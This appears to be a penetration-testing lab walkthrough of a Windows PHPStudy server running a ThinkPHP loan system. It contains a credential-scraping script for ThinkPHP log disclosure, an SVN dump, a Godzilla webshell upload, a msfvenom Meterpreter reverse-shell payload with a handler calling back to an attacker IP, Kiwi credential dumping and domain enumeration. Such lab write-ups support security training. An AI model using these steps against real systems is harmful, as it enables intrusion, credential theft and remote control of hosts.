Information Gathering
Target IP: 192.168.0.104
Port Scanning
Perform full port scanning using masscan for speed, followed by detailed nmap scanning of open ports:
masscan -p 1-65535 192.168.0.104 --rate=1000
Ports 445, 3389, and 80 indicate a Windows server with MySQL database. Web service runs on port 80, displaying a PHPStudy default page.
Detailed nmap scan with service detection and vulnerability assessment:
nmap -p 3306,445,3389,80,47001,49152,49156,49153,135,49157 -sS -sC -A 192.168.0.104 -oA target-scan
Scan reveals DNS resolution requirements. Domain binding is necessary for proper acces.
Domainn Configuration
Modify hosts file to bind domain www.webhack123.com to target IP. Accessing http://www.webhack123.com/ reveals a loan management system.
Initial Access Vector
Framework Vulnerability Analysis
Wappalyzer identifies ThinkPHP framework. Error reporting provides absolute path: C:\phpstudy_pro\WWW\www.webhack123.com\Base\Common\functions.php
ThinkPHP 3.x log disclosure vulnerability exists at http://www.webhack123.com/App/Runtime/Logs/. Database credentials and admin passwords are exposed in error logs containing SQL execution details.
Python script to parse logs and extract credentials:
import requests
import datetime
def fetch_log_credentials(base_url):
current_year = datetime.datetime.now().year
credential_data = []
for year in range(current_year-3, current_year+1):
for month in range(1, 13):
for day in range(1, 32):
log_name = f"{year%100:02d}_{month:02d}_{day:02d}.log"
log_url = f"{base_url}{log_name}"
try:
response = requests.get(log_url, timeout=5)
if response.status_code == 200 and "password" in response.text:
credential_data.append(response.text)
print(f"Found credentials in: {log_url}")
except requests.RequestException:
continue
return credential_data
log_base = "http://www.webhack123.com/App/Runtime/Logs/"
credentials = fetch_log_credentials(log_base)
with open("extracted_creds.txt", "w", encoding="utf-8") as output_file:
for data in credentials:
output_file.write(data + "\n")
Analysis reveals database credentials in recent log files. Successful decryption yields admin credentials: admin/web123.
Administrative Interface Discovery
Directory scanning fails to identify admin panel but reveals SVN source code disclosure vulnerability at http://www.webhack123.com/.svn
SVN source code extraction:
python SvnExploit.py -u http://www.webhack123.com/.svn --dump
Examination of downloaded source code reveals administrative subdomain information. Additional hosts entry required for subdomain access.
Access administrative interface with obtained credentials at discovered subdomain.
Webshell Deployment
System configuration allows modification of uploadable file extensions. Deploy Godzilla webshell through file upload functionality.
Verify shell execution with administrator privileges. Prepare for Meterpreter session establishment.
Establishing Persistent Access
Payload Generation and Deployment
Create Windows reverse shell payload:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.11.115 LPORT=7799 -f exe > payload.exe
Initiate Metasploit handler:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.11.115
set LPORT 7799
exploit
Upload and execute payload via webshell to establish Meterpreter session.
Domain Environment Reconnaissance
Background active session and perform process migration:
ps
migrate <process_id>
Load Kiwi module for credential extraction:
load kiwi
creds_all
Examine network configuration and ARP table for domain hosts:
ipconfig /all
arp -a
Analysis identifies 10.10.10.149 as domain controller based on network configuration and host relationships.
Shell encoding adjustment for proper output:
chcp 65001
Domain enumeration commands:
net view
net view /domain
net group /domain
Network connectivity issues limit domain host discovery to single visible system.